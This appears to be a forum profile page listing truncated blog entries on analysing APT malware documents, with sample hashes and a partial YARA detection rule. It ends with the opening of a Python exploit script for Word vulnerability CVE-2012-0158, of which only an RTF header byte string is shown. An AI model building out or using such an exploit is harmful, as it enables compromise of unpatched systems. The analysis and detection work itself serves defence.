About w@rri0r@bh@y

Basic Information

Statistics
Total Posts
6
Posts Per Day
0.00
General Information
Last Activity
03-23-2015 06:00 PM
Join Date
02-22-2014
Referrals
0
View w@rri0r@bh@y's Blog

Recent Entries

Apt inception

by w@rri0r@bh@y on 03-23-2015 at 05:09 PM
Greet: "Vinnu", "nightrover", "bond"

In December 2014 BlueCoat released a report on an APT campaign named "Inception". The spear-phishing mail was sent with attachments under various names; we analyzed the attachment named "Car for sale.doc". The attachment was an exploit (CVE-2012-0158) with an embedded VBS and a decoy file themed as an advertisement for a used car for sale that purportedly originated from Michael Hahne, an employee at the

Read More

Updated 03-23-2015 at 05:59 PM by 41.w4r10r

Categories
Uncategorized

Apt sme

by w@rri0r@bh@y on 03-20-2015 at 11:41 AM
Greet: "Vinnu", "nightrover", "bond"

I have used the name "APT SME" because the payload developer used that name for his project. I have just created automation to extract the payload file from the exploit used in APT SME.

Sample used for creating Automation:
MD5 - 57A8DB5A5D35464BE16518332A64A992

Shellcode:


Read More

Updated 03-20-2015 at 12:00 PM by w@rri0r@bh@y

Categories
Uncategorized

Apt vitnam

by w@rri0r@bh@y on 03-20-2015 at 11:34 AM
Greet: "vinnu", "nightrover", "bond"

I used the name "VITNAM" because the decoy file had some contents from Vietnam. Here I have automated a process through which we can extract an executable from an RTF exploit.

Yara Rule:
Code:
rule APT_VITNAM {
  meta:
   author = "w@rri0r@bh@y"
  strings :
   $magic = "{\\rt"
   $v0 = "eb00eb1490905e33c980368746"

Read More

Updated 03-20-2015 at 02:35 PM by [s]

Categories
Uncategorized

Apt carbanak

by w@rri0r@bh@y on 03-20-2015 at 11:30 AM
Greet: "Vinnu", "nightrover", "bond"

All the analysis was done by the company "Kaspersky". I have just created automation to extract the payload from the exploit used in APT CARBANAK.

Sample used for creating Automation:
MD5 - 8fa296efaf87ff4d9179283d42372c52, 665b6cb31d962aefa3037b5849889e06, 2c395f211db2d02cb544448729d0f081, 31e16189e9218cb131fdb13e75d0a94f, db83e301564ff613dd1ca23c30a387f0, 86e48a9be62494bffb3b8e5ecb4a0310, 6c7ac8dfd7bc5c2bb1a6d7aec488c298

Read More

Updated 03-20-2015 at 12:01 PM by w@rri0r@bh@y

Categories
Uncategorized

Exploit for MS WORD 2010 in Windows 7 (CVE-2012-0158)

by w@rri0r@bh@y on 03-01-2014 at 04:14 PM
Exploit For MS WORD 2010
CVE-2012-0158
ASLR BYPASS - MSCOMCTL.OCX (non-ASLR Module)
DEP BYPASS - Complete code in code section

Code:
#!/usr/bin/python

import struct
import binascii

header = (
"\x7B\x5C\x72\x74\x66\x31\x0D\x0A\x7B\x5C\x66\x6F\x6E\x74\x74\x62\x6C\x7B\x5C\x66\x30\x5C"
"\x66\x6E\x69\x6C\x5C\x66\x63\x68\x61\x72\x73\x65\x74\x30\x20\x56\x65\x72\x64\x61\x6E\x61"
"\x3B\x7D\x7D\x0D\x0A\x5C\x76\x69\x65\x77\x6B\x69\x6E\x64\x34\x5C\x75\x63\x31\x5C\x70\x61"

Read More

Updated 03-02-2014 at 07:55 PM by w@rri0r@bh@y

Categories
Uncategorized